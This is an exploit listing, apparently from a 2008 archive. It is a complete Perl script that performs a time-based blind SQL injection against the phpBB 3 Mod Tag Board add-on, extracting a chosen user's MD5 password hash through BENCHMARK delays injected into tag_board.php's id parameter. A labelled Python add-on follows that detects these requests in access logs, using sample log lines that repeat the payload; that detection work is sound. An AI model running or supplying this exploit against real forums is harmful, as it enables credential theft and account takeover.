phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
Source: staker[at]hotmail[dot]it  Author: athos  Published: 2008-12-09
#!/usr/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit 
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102);
my $http  = new LWP::UserAgent;

my $host  = shift;
my $table = shift;
my $myid  = shift or &usage;


sub injection
{
    my ($sub,$char) = @_;
   
    return "/tag_board.php?mode=controlpanel&action=delete&id=".
           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
           "ers+where+user_id=${myid})--";
}


sub usage
{
    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
    exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
    for my $j(0..16)
    {
        $time1 = time();

        $http->get($host.injection($i,$chars[$j]));
       
        $time2 = time();

        if($time2 - $time1 > 6)
        {
            syswrite(STDOUT,chr($chars[$j]));
            $hash .= chr($chars[$j]);
            last;
        }
       
        if($i == 1 && length $hash < 0)
        {
            syswrite(STDOUT,"Exploit Failed!\n");
            exit;
        }
    }
}
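
Added example, not part of the original listing or the author's code: a defensive log check for the request shape that injection() builds above. It flags tag_board.php requests whose id parameter is not a plain integer and lists the SQL primitives found; the log lines, client addresses and the phpbb_users table name (prefix taken from the script's usage example) are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access-log lines (documentation IPs), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2008:10:00:01 +0000] "GET /phpBB/tag_board.php?mode=controlpanel&action=delete&id=7 HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Dec/2008:10:00:02 +0000] "GET /phpBB/tag_board.php?mode=controlpanel&action=delete&id=1+and+(select+if((ascii(substring(user_password,1,1))=48),benchmark(230000000,char(0)),0)+from+phpbb_users+where+user_id=2)-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Dec/2008:10:00:11 +0000] "GET /phpBB/tag_board.php?mode=controlpanel&action=delete&id=1%20AND%20(SELECT%20IF((ASCII(SUBSTRING(user_password,1,1))=49),BENCHMARK(230000000,CHAR(0)),0)%20FROM%20phpbb_users%20WHERE%20user_id=2)-- HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Dec/2008:10:00:12 +0000] "GET /phpBB/viewforum.php?f=3 HTTP/1.1" 200 2048',
]

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL function calls and comment markers that never belong in a numeric id.
SQL_RE = re.compile(r'\b(benchmark|sleep|substring|ascii|if)\s*\(|(--)', re.I)


def inspect_line(line):
    """Return (client_ip, tokens) for a suspicious tag_board.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith('/tag_board.php'):
        return None
    # parse_qs decodes both '+' and %XX, so encoded variants are normalised first.
    ids = parse_qs(url.query, keep_blank_values=True).get('id', [])
    bad = [v for v in ids if not re.fullmatch(r'\d+', v)]
    if not bad:
        return None
    tokens = sorted({(a or b).lower() for v in bad for a, b in SQL_RE.findall(v)})
    return ip, tokens


def summarize(lines):
    """Count suspicious requests per client; repeated probes suggest blind extraction."""
    hits = Counter()
    for line in lines:
        finding = inspect_line(line)
        if finding:
            hits[finding[0]] += 1
    return dict(hits)


if __name__ == '__main__':
    for ip, n in summarize(SAMPLE_LOG).items():
        print(f'{ip}: {n} non-numeric id request(s) to tag_board.php')
```

The script decides on responses that take longer than 6 seconds, so recording request duration in the access log gives a second signal next to these hits.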

 